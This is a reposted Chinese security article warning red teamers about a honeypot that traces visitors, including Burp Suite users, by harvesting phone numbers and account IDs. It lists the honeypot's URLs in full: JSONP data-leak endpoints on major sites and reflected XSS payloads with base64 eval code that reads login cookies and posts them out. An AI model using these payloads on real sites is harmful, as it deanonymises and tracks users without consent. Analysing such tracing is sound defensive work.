警惕 一种针对红队(Burpsuite)的新型溯源手段!
2022-7-29 11:53:48 Author: Ots安全(查看原文) 阅读量:319 收藏

两天前,github一名写者:fuckjsonp发布一篇文章称,已发现一种针对红队的新型溯源手段

首先打开网站,他会说如果开启代码调试模式,溯源会停止加载。

另外,你们使用针对Burpsuite的用户。小心的Burpsuite是否存在chrome的漏洞。

沙箱的特征如下,直接加载js

重点获取手机号js代码,可以看到会获取三大运营商的手机信息

加密

获取联通的接口

如果拿到手机号码的话,加密的手机号上传

另外其他溯源接口如下

https://access.video.qq.com/trans/pay.video.qq.com/fcgi-bin/payvip?vappid=68106135&vsecret=e667570eb833960cc41051d498df1c233308eb195dba2cc3&getannual=1&geticon=1&getsvip=1&otype=json&callback=jQuery19104991404611435173_1562551736901&uin=a&t=1&getadpass=0&g_tk=a&g_vstk=a&g_actk=&_=15625517369020.4515320024420155
https://bbs.zhibo8.cc/user/userinfo?device=pc&_=1584613345023&callback=jcbDNoDtQbW&callback=callback_165893378313192912
https://myjr.suning.com/sfp/mutualTrust/getLoginInfo.htm?callback=getphone
https://myjr.suning.com/sfp/headPic/getEgoMemberHeadPicUrl.htm
https://ajax.58pic.com/58pic/index.php?m=adManageSystem&a=showAdDeliveryForPosition&callback=%3Cscript%3Eeval(atob(%27ZnVuY3Rpb24gZ2V0Q29va2llKG5hbWUpIAp7IAogICAgdmFyIGFycixyZWc9bmV3IFJlZ0V4cCgiKF58ICkiK25hbWUrIj0oW147XSopKDt8JCkiKTsKIAogICAgaWYoYXJyPWRvY3VtZW50LmNvb2tpZS5tYXRjaChyZWcpKQogCiAgICAgICAgcmV0dXJuIGRlY29kZVVSSUNvbXBvbmVudChhcnJbMl0pOyAKICAgIGVsc2UgCiAgICAgICAgcmV0dXJuIG51bGw7IAp9CndpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoeyJuYW1lIjoicWlhbnR1IiwiZGF0YSI6eyJ1aWQiOmdldENvb2tpZSgicXRfdWlkIil9fSwnKicpOw==%27))%3C/script%3E&position=31&keyword=XXX&_=1590829943379
https://my.zol.com.cn/public_new.php
https://access.video.qq.com/trans/pay.video.qq.com/fcgi-bin/payvip?vappid=68106135&vsecret=e667570eb833960cc41051d498df1c233308eb195dba2cc3&getannual=1&geticon=1&getsvip=1&otype=json&callback=jQuery19104991404611435173_1562551736901&uin=a&t=1&getadpass=0&g_tk=a&g_vstk=a&g_actk=&_=15625517369020.04630644674906281
https://access.video.qq.com/trans/pay.video.qq.com/fcgi-bin/payvip?vappid=68106135&vsecret=e667570eb833960cc41051d498df1c233308eb195dba2cc3&getannual=1&geticon=1&getsvip=1&otype=json&callback=jQuery19104991404611435173_1562551736901&uin=a&t=1&getadpass=0&g_tk=a&g_vstk=a&g_actk=&_=15625517369020.38244545320223655
http://my.zol.com.cn/public_new.php
https://loginst.suning.com/authStatus?callback=getuid
https://www.fhyx.com/account/login.html?redirecturl=%22%3E%3CSCrIpT%3Eeval(atob(unescape(location.hash.slice(1))))%3C/SCrIpT%3E
https://so.u17.com/all/%22%3C/span%3E%250a%3Cimg%2520src=1%20onerror=%22document.body.innerHTML=location.search;document.body.innerHTML=document.body.innerText;%22%3E%250a%22/m0_p1.html?<img/src="x"/onerror=a=eval;a(atob(unescape(location.hash.slice(1))))>
https://i.vip.iqiyi.com/client/store/pc/checkout.action?platform=b6c13e26323c537d&fs=&fsSign=&fc=&fv=&qc005=&P00001=&pid=adb3376b039b970b&vipType=2&aid=&device_id=&callback=callback_165893378307001282
https://login.sina.com.cn/sso/login.php?client=&service=&client=&encoding=&gateway=1&returntype=TEXT&useticket=0&callback=sina2&_=1577938268947&callback=callback_165893378307919803
https://v-api-plus.huya.com/jsapi/getUserInfo?callback=jQuery1111007865243652615272_1628490347897&_=1628490347898&callback=callback_165893378306693233
http://mapp.jrj.com.cn/pc/content/getMqNews?vname=%3Csvg%20onload=eval(atob(%27ZnVuY3Rpb24gZ2V0Q29va2llKG5hbWUpIAp7IAogICAgdmFyIGFycixyZWc9bmV3IFJlZ0V4cCgiKF58ICkiK25hbWUrIj0oW147XSopKDt8JCkiKTsKIAogICAgaWYoYXJyPWRvY3VtZW50LmNvb2tpZS5tYXRjaChyZWcpKQogCiAgICAgICAgcmV0dXJuIGRlY29kZVVSSUNvbXBvbmVudChhcnJbMl0pOyAKICAgIGVsc2UgCiAgICAgICAgcmV0dXJuIG51bGw7IAp9CndpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoeyJuYW1lIjoianJqIiwiZGF0YSI6eyJ1aWQiOmdldENvb2tpZSgibXlqcmpfdXNlcmlkIil9fSwnKicpOw==%27))%3E
https://www.ixueshu.com/index.html?v=1608893853571&template=sys_login_ajax.html&_url=123123123%22%22%3E%3CsCrIpT%3Eeval(atob(unescape(location.hash.slice(1))))%3C/sCrIpT%3E
https://hackit.me/v.qq.com/
https://api.csdn.net/oauth/authorize?client_id=1000001&redirect_uri=http://www.iteye.com/auth/csdn/callback&respon

根据目前访问:URL/monitordevinfo/common.js,之后触发了火绒。


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247495394&idx=1&sn=43b70f7d0f103fc45652f3693cc602d1&chksm=9bada7a9acda2ebfc616eb905dc571d58b8f4b061bcec1d0a5b8132e62b626e08de73d7deba7#rd
如有侵权请联系:admin#unsafe.sh